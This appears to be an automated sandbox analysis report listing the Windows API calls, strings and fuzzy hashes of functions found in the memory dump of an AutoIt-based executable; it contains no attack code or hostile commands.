                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                                                  • Opcode ID: b7dbf684d28d1d4c1bb497779997abaa8d7efb809d1d5ca39c4d9ba9988c4985
                                                                                                                                                                  • Instruction ID: 286329cae221ffad4ec26c7558d7ae5da3e0e38496f17210557527583db6f0d6
                                                                                                                                                                  • Opcode Fuzzy Hash: b7dbf684d28d1d4c1bb497779997abaa8d7efb809d1d5ca39c4d9ba9988c4985
                                                                                                                                                                  • Instruction Fuzzy Hash: F4311431720216AFEB29CF58EC88F5937A5FB4A764F154164F6058B2B2CFB1A860DB41
                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00221734
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0022175A
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0022175D
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0022177B
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00221784
                                                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 002217A9
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 002217B7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                  • Opcode ID: 1fb4f8d8f6a8457b24b459216c42c3efbefe861634380924f87ba0ad53f2351e
                                                                                                                                                                  • Instruction ID: 33281fb79c1924968e61355b7122b5ce4f2655db7df5262d5ca1c6c80e0be300
                                                                                                                                                                  • Opcode Fuzzy Hash: 1fb4f8d8f6a8457b24b459216c42c3efbefe861634380924f87ba0ad53f2351e
                                                                                                                                                                  • Instruction Fuzzy Hash: BF217475610219BFDB109FA8EC88DBFB3ECEB59360B408125F915DB291DBB0ED518B60
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                                                                  • Opcode ID: 45f4c5c62a7a65fa48d24acdb135890f21eb74ec13219bea81de09710eadc3e5
                                                                                                                                                                  • Instruction ID: ec882558393a6c9a8c20582c82b5f91f7745ee976c75defedd0fb1072c716cd5
                                                                                                                                                                  • Opcode Fuzzy Hash: 45f4c5c62a7a65fa48d24acdb135890f21eb74ec13219bea81de09710eadc3e5
                                                                                                                                                                  • Instruction Fuzzy Hash: 05210D31134632B6D331EAB4AD06FBB73A89F65310F10401AF549871C2EBD59B66C2A1
                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0022180D
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00221833
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00221836
                                                                                                                                                                  • SysAllocString.OLEAUT32 ref: 00221857
                                                                                                                                                                  • SysFreeString.OLEAUT32 ref: 00221860
                                                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 0022187A
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00221888
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                  • Opcode ID: c3eea7b7a33a781f697d8e0254b65000ce3e1cfff6da8591017c57b9e396b787
                                                                                                                                                                  • Instruction ID: 156b395083dc35d3d07b38b178c70104a4ed3a0c6fe21b214f7f70f5afa45eeb
                                                                                                                                                                  • Opcode Fuzzy Hash: c3eea7b7a33a781f697d8e0254b65000ce3e1cfff6da8591017c57b9e396b787
                                                                                                                                                                  • Instruction Fuzzy Hash: 242195356102157FEB109FE8ECC8DAAB7ECEB193607408125F904DB2A1DAB0EC518B60
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001FC657
                                                                                                                                                                    • Part of subcall function 001FC619: GetStockObject.GDI32(00000011), ref: 001FC66B
                                                                                                                                                                    • Part of subcall function 001FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 001FC675
                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0024A13B
                                                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0024A148
                                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0024A153
                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0024A162
                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0024A16E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                                                  APIs
                                                                                                                                                                  • __getptd_noexit.LIBCMT ref: 00204C3E
                                                                                                                                                                    • Part of subcall function 002086B5: GetLastError.KERNEL32(?,00200127,002088A3,00204673,?,?,00200127,?,001E125D,00000058,?,?), ref: 002086B7
                                                                                                                                                                    • Part of subcall function 002086B5: __calloc_crt.LIBCMT ref: 002086D8
                                                                                                                                                                    • Part of subcall function 002086B5: GetCurrentThreadId.KERNEL32 ref: 00208701
                                                                                                                                                                    • Part of subcall function 002086B5: SetLastError.KERNEL32(00000000,00200127,002088A3,00204673,?,?,00200127,?,001E125D,00000058,?,?), ref: 00208719
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00204C1D), ref: 00204C52
                                                                                                                                                                  • __freeptd.LIBCMT ref: 00204C59
                                                                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,00204C1D), ref: 00204C61
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00204C1D), ref: 00204C91
                                                                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,?,00204C1D), ref: 00204C98
                                                                                                                                                                  • __freefls@4.LIBCMT ref: 00204CB4
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1445074172-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 0024E14D
                                                                                                                                                                  • _memset.LIBCMT ref: 0024E15C
                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002A3EE0,002A3F24), ref: 0024E18B
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0024E19D
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                  • String ID: $?*$>*
                                                                                                                                                                  • API String ID: 3277943733-711202312
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 001FC6C0
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 001FC701
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 001FC729
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 001FC856
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 001FC86F
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3253778849-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscpy$_wcscat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2037614760-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00222AF6
                                                                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00222B68
                                                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00222BC3
                                                                                                                                                                  • _memmove.LIBCMT ref: 00222BED
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00222C3A
                                                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00222C68
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1101466143-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenu.USER32(?), ref: 0024833D
                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00248374
                                                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0024839C
                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 0024840B
                                                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00248419
                                                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0024846A
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 650687236-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 0022552E
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00225579
                                                                                                                                                                  • IsMenu.USER32(00000000), ref: 00225599
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 002255CD
                                                                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 0022562B
                                                                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0022565C
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3311875123-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 001FB1C1
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 001FB225
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 001FB242
                                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001FB253
                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 001FB29D
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1827037458-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • ShowWindow.USER32(002A1810,00000000,?,?,002A1810,002A1810,?,0025E2D6), ref: 0024E21B
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 0024E23F
                                                                                                                                                                  • ShowWindow.USER32(002A1810,00000000,?,?,002A1810,002A1810,?,0025E2D6), ref: 0024E29F
                                                                                                                                                                  • ShowWindow.USER32(?,00000004,?,?,002A1810,002A1810,?,0025E2D6), ref: 0024E2B1
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 0024E2D5
                                                                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0024E2F8
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 001FB5EB
                                                                                                                                                                    • Part of subcall function 001FB58B: SelectObject.GDI32(?,00000000), ref: 001FB5FA
                                                                                                                                                                    • Part of subcall function 001FB58B: BeginPath.GDI32(?), ref: 001FB611
                                                                                                                                                                    • Part of subcall function 001FB58B: SelectObject.GDI32(?,00000000), ref: 001FB63B
                                                                                                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0024E9F2
                                                                                                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 0024EA06
                                                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0024EA14
                                                                                                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 0024EA24
                                                                                                                                                                  • EndPath.GDI32(00000000), ref: 0024EA34
                                                                                                                                                                  • StrokePath.GDI32(00000000), ref: 0024EA44
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0021EFB6
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0021EFC7
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0021EFCE
                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0021EFD6
                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0021EFED
                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0021EFFF
                                                                                                                                                                    • Part of subcall function 0021A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0021A79D,00000000,00000000,?,0021AB73), ref: 0021B2CA
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 603618608-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 002087D7
                                                                                                                                                                    • Part of subcall function 00201E5A: __initp_misc_winsig.LIBCMT ref: 00201E7E
                                                                                                                                                                    • Part of subcall function 00201E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00208BE1
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlsAlloc), ref: 00208BF5
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlsFree), ref: 00208C08
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlsGetValue), ref: 00208C1B
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlsSetValue), ref: 00208C2E
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00208C41
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CreateSemaphoreExW), ref: 00208C54
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00208C67
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00208C7A
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,SetThreadpoolTimer), ref: 00208C8D
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00208CA0
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00208CB3
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CreateThreadpoolWait), ref: 00208CC6
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,SetThreadpoolWait), ref: 00208CD9
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,CloseThreadpoolWait), ref: 00208CEC
                                                                                                                                                                    • Part of subcall function 00201E5A: 6C1F6DE0.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00208CFF
                                                                                                                                                                  • __mtinitlocks.LIBCMT ref: 002087DC
                                                                                                                                                                    • Part of subcall function 00208AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0029AC68,00000FA0,?,?,002087E1,00206AFA,002967D8,00000014), ref: 00208AD1
                                                                                                                                                                  • __mtterm.LIBCMT ref: 002087E5
                                                                                                                                                                    • Part of subcall function 0020884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 002089CF
                                                                                                                                                                    • Part of subcall function 0020884D: _free.LIBCMT ref: 002089D6
                                                                                                                                                                    • Part of subcall function 0020884D: RtlDeleteCriticalSection.NTDLL(0029AC68), ref: 002089F8
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 0020880A
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00208833
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3163737558-0
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1423608774-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001E1898
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 001E18A0
                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001E18AB
                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001E18B6
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 001E18BE
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 001E18C6
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                                  • Opcode ID: a785c22a6f92de47032cfd41fcce9b73d64a70e4f7c0309d9c72aab788aabe9f
                                                                                                                                                                  • Instruction ID: 679e2cbd38efbb37078d6196d99069df767423c8c15249abc5a72e1262a0ca14
                                                                                                                                                                  • Opcode Fuzzy Hash: a785c22a6f92de47032cfd41fcce9b73d64a70e4f7c0309d9c72aab788aabe9f
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F0144B0A02B5ABDE3008F6A8C85A52FEA8FF19354F04411BE15C47A42C7F5A864CBE5
                                                                                                                                                                  APIs
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00228504
                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0022851A
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00228529
                                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00228538
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00228542
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00228549
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                                                  • Opcode ID: c19b258c0588ff83d02b42b8c6f34d3661377db6168acf70b3ee6c1e143e619c
                                                                                                                                                                  • Instruction ID: f749c89c01627c7336058c398b792870746135ccd22f67bfb1addb569d80ebac
                                                                                                                                                                  • Opcode Fuzzy Hash: c19b258c0588ff83d02b42b8c6f34d3661377db6168acf70b3ee6c1e143e619c
                                                                                                                                                                  • Instruction Fuzzy Hash: F0F01D72B41159BBE7215B52FD0EEEF7A7CDBCAB15F004058F60591050D7E06A01C6B5
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0022A330
                                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 0022A341
                                                                                                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,002566D3,?,?,?,?,?,001EE681), ref: 0022A34E
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,002566D3,?,?,?,?,?,001EE681), ref: 0022A35B
                                                                                                                                                                    • Part of subcall function 00229CCE: CloseHandle.KERNEL32(?,?,0022A368,?,?,?,002566D3,?,?,?,?,?,001EE681), ref: 00229CD8
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0022A36E
                                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 0022A375
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                                  • Opcode ID: f1b3d5678e1745d686c909410ae5d4f510c5c80e3869c548753f0f823dca9e32
                                                                                                                                                                  • Instruction ID: 75b47b64c22200cc58e5d7074ab34c595849d40b01190c9550b63597411216f0
                                                                                                                                                                  • Opcode Fuzzy Hash: f1b3d5678e1745d686c909410ae5d4f510c5c80e3869c548753f0f823dca9e32
                                                                                                                                                                  • Instruction Fuzzy Hash: 65F05E32A51226ABD3112FA4FD5CDDB7B79EF89702B004561F602914A2CBF59851CB51
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memmove.LIBCMT ref: 001EC419
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00226653,?,?,00000000), ref: 001EC495
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead_memmove
                                                                                                                                                                  • String ID: Sf"
                                                                                                                                                                  • API String ID: 1325644223-2004665406
                                                                                                                                                                  • Opcode ID: ceb3ec440c270707f8fa62a0cb8d53acc605e7c95e0d0cd06b35567dc7bb9803
                                                                                                                                                                  • Instruction ID: 7d12010dd648316750d07fd174cbb40375e3e3129cf61eff921bb1cee146207c
                                                                                                                                                                  • Opcode Fuzzy Hash: ceb3ec440c270707f8fa62a0cb8d53acc605e7c95e0d0cd06b35567dc7bb9803
                                                                                                                                                                  • Instruction Fuzzy Hash: BCA1DD30A04A49EBEB04CF66C884BBDFBB0FF05300F14C195E8699B281D735E966DB91
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0020010A: std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                    • Part of subcall function 0020010A: __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                    • Part of subcall function 001EBBD9: _memmove.LIBCMT ref: 001EBC33
                                                                                                                                                                  • __swprintf.LIBCMT ref: 001FD98F
                                                                                                                                                                  Strings
                                                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 001FD832
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                                                                  • Opcode ID: d1ce9dd5ad88eece3abaaa9b37a8d5caeb74789b0a9e6e4df157c9ef34da31fe
                                                                                                                                                                  • Instruction ID: 00be2b1f225bd43e2e46a5e1253463e697a0e3bbe1e95ee4d2b53945391f7885
                                                                                                                                                                  • Opcode Fuzzy Hash: d1ce9dd5ad88eece3abaaa9b37a8d5caeb74789b0a9e6e4df157c9ef34da31fe
                                                                                                                                                                  • Instruction Fuzzy Hash: B9919731128745ABC724EF24C885C7EB7A5FFA5700F00095DF986972A2EB70ED18CB56
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0023B4A8
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 0023B5B7
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0023B73A
                                                                                                                                                                    • Part of subcall function 0022A6F6: VariantInit.OLEAUT32(00000000), ref: 0022A736
                                                                                                                                                                    • Part of subcall function 0022A6F6: VariantCopy.OLEAUT32(?,?), ref: 0022A73F
                                                                                                                                                                    • Part of subcall function 0022A6F6: VariantClear.OLEAUT32(?), ref: 0022A74B
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                                                                  • Opcode ID: 56a6b5e40842b8c6345d066b7f2e0875b3ba02db807a3d1e01b96000e65ba4bb
                                                                                                                                                                  • Instruction ID: 7d5ccea83f4c70f03af1162c571bbc6f56586a8f00bd6684873aab8d5c84a17a
                                                                                                                                                                  • Opcode Fuzzy Hash: 56a6b5e40842b8c6345d066b7f2e0875b3ba02db807a3d1e01b96000e65ba4bb
